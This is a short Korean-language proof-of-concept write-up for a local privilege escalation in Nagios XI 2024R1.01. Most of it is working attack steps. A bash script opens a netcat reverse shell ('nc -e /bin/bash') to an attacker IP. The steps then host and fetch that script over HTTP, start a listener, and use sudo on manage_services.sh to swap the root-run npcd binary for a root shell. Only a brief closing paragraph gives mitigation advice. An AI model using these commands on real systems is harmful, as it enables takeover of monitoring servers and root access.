
Nagios 2024R1.01에서 권한 상승
CVE 발견자: Jarod Jaslow (MAWK)
"NAGIOS" 사용자로 공격자 머신에 다음 내용의 파일을 생성합니다:
#!/bin/bash
nc -e /bin/bash <Attacker IP> 4445

Python HTTP 서버를 통해 공격자 머신에서 파일을 호스팅합니다:
python3 -m http.server 8000

공격자 머신에서 Netcat(NC) 리스닝 서버를 시작합니다:
nc -nlvp 4445

공격자 머신에서 파일을 가져옵니다:
wget http://<Attacker IP>:8000/npcd

다음 명령을 실행하여 권한을 상승시키고 루트로 연결을 수신합니다:
sudo /usr/local/nagiosxi/scripts/manage_services.sh stop npcd
cp npcd /usr/local/nagios/bin/npcd
sudo /usr/local/nagiosxi/scripts/manage_services.sh start npcd


루트로 실행되는 Nagios 서비스 실행 파일에 대해 "NAGIOS" 사용자가 쓰기 작업을 수행할 수 있는 권한을 제한하는 것이 좋습니다. 이는 Nagios 서비스와 관련된 디렉터리 및 파일에 대해 더 엄격한 파일 권한과 액세스 제어를 구현함으로써 달성할 수 있습니다.
이 문제는 새 릴리스에서 수정되어야 합니다.
CVE: